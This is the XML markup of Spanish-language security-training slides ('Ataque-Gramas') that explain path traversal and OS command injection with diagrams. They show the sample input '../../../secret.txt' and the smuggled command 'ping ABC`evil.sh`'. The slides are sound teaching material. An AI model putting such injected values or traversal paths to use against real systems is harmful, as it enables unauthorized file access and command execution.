          <p:cNvPr id="64" name="Group 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F74CA301-D0DB-954F-8811-F42C5E388242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1228580" y="4514012"/>
            <a:ext cx="1050542" cy="1209402"/>
            <a:chOff x="1228580" y="4514012"/>
            <a:chExt cx="1050542" cy="1209402"/>
          </a:xfrm>
        </p:grpSpPr>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77601" y="4514012"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1228580" y="5415637"/>
              <a:ext cx="1050542" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Atacante</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Curved Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C361591-A5FB-B349-BCAF-FF8BE597FD85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1997137" y="2684971"/>
            <a:ext cx="1585755" cy="2072326"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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621EC77-1618-5043-AEE2-5DBDF80E9CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081458" y="3427124"/>
            <a:ext cx="2766027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../secret.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{623D2E1C-5E9C-E341-8301-F960DFDDA3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25589" y="2315364"/>
            <a:ext cx="456525" cy="456525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A6AA06-C655-4F43-9E99-C420AE56523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69652" y="2015208"/>
            <a:ext cx="913049" cy="913049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Graphic 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458E9429-3307-B84C-A2B5-BA0BBB18BDD2}"/>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2658921" y="2167171"/>
            <a:ext cx="710294" cy="710294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Graphic 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE43077-F31A-BC47-BC8E-C07B195917B3}"/>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2050602" y="2269583"/>
            <a:ext cx="584732" cy="584732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Curved Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC8D0D6-51D9-8245-9D49-9311AC3872D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3075994" y="3678439"/>
            <a:ext cx="1511926" cy="11561"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="62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urved Connector 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B38DB61-E807-4441-BEA6-FA5D51C04340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="0"/>
            <a:endCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3039579" y="2141660"/>
            <a:ext cx="761086" cy="812109"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30036"/>
              <a:gd name="adj2" fmla="val 43758"/>
              <a:gd name="adj3" fmla="val 130036"/>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D64F8AEE-94E6-A644-AAFD-06A2904597B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="50" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2374577" y="2237974"/>
            <a:ext cx="607882" cy="671100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37606"/>
              <a:gd name="adj2" fmla="val 45322"/>
              <a:gd name="adj3" fmla="val 137606"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB8F141-975A-9445-92BC-6841FA4F3382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1778934" y="2290281"/>
            <a:ext cx="538951" cy="589116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42416"/>
              <a:gd name="adj2" fmla="val 44559"/>
              <a:gd name="adj3" fmla="val 142416"/>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23E0F19-51A2-CC47-B438-25CD6E1F428B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577057" y="2071942"/>
            <a:ext cx="1062663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="TextBox 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1E328E-278A-7442-8F3C-EA6F3A1E6EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918399" y="4128926"/>
            <a:ext cx="2766027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89413106-322E-8547-B5C4-15B2FBE47466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718048" y="1348454"/>
            <a:ext cx="5715732" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t>Utilizando un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1"/>
              <a:t>traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t> (también conocido como ../), un atacante puede abusar de un link de descarga para acceder a un archivo de un directorio privado.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4632930D-D0CA-CDDB-486D-322B58884EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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37490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C225E-476D-32FE-D7B9-23A2F2503C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127E19-C99F-C23E-FFE2-A66B5B6CA81C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279122" y="294343"/>
            <a:ext cx="9726403" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" b="1" dirty="0"/>
              <a:t>Inyección de comandos OS</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426196F6-351C-66A0-3A91-F6C1BB715D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6501718" y="1627365"/>
            <a:ext cx="5715732" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>La inyección de comandos de sistema operativo (OS) permite a un atacante añadir un script malicioso a la llamada de ejecución de un programa si se ejecuta a través de una terminal (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE860A1-4CA9-282B-68E3-9C973A07C41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Google Shape;486;p29" descr="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{373ACA42-331D-FCC8-8E52-14B5C72DC8DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="52999"/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374191" y="2042383"/>
            <a:ext cx="1371684" cy="1666427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;487;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB57A37A-B017-FA6A-FFFE-BA35503BFCC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625309" y="5413253"/>
            <a:ext cx="959100" cy="36930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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;488;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5A2FAE-1CFC-7551-F638-7677EB7B5F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087298" y="3610736"/>
            <a:ext cx="2376" cy="1447362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="55686"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;489;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{350FCA83-BE8D-405B-7313-52A0954BD7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150580" y="4070769"/>
            <a:ext cx="2977913" cy="5847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3200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>host: ABC`evil.sh`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;490;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93BF3A1E-4F7B-901B-90C1-C5C224016FED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562711" y="1726948"/>
            <a:ext cx="1003026"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Programa</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;491;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278CAAFE-CD7C-DA1E-F0E7-862859C2E68B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2952176" y="1857717"/>
            <a:ext cx="1798437" cy="64629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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Sistema Operativo</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;492;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A7DDDF-884B-7E36-1D82-95DA4944AA56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1745874" y="2870620"/>
            <a:ext cx="1390073" cy="12701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="0"/>
                  <a:pt x="10800" y="5400"/>
                  <a:pt x="10800" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16200"/>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="55686"/>
              </a:srgbClr>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chemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;493;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E92B168F-4FFB-25E1-5D8A-3E56C61F2066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773204" y="2542484"/>
            <a:ext cx="1310889" cy="307736"/>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400"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ping ABC`evil.sh`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Google Shape;494;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D08275-7421-45F4-830B-5F19E6E73422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4986461" y="1627365"/>
            <a:ext cx="1519936" cy="968625"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1519935" cy="968624"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Google Shape;495;p29" descr="Graphic 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D43E7A67-F4F3-63C5-C30F-82DE97838247}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1159824" cy="968624"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Google Shape;496;p29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42445C48-DE88-2918-5D93-3D8436C63AC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="45719" y="0"/>
              <a:ext cx="1474216" cy="2311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900"/>
                <a:buFont typeface="Courier"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:rPr>
                <a:t>&gt;_ ping ABC</a:t>
              </a:r>
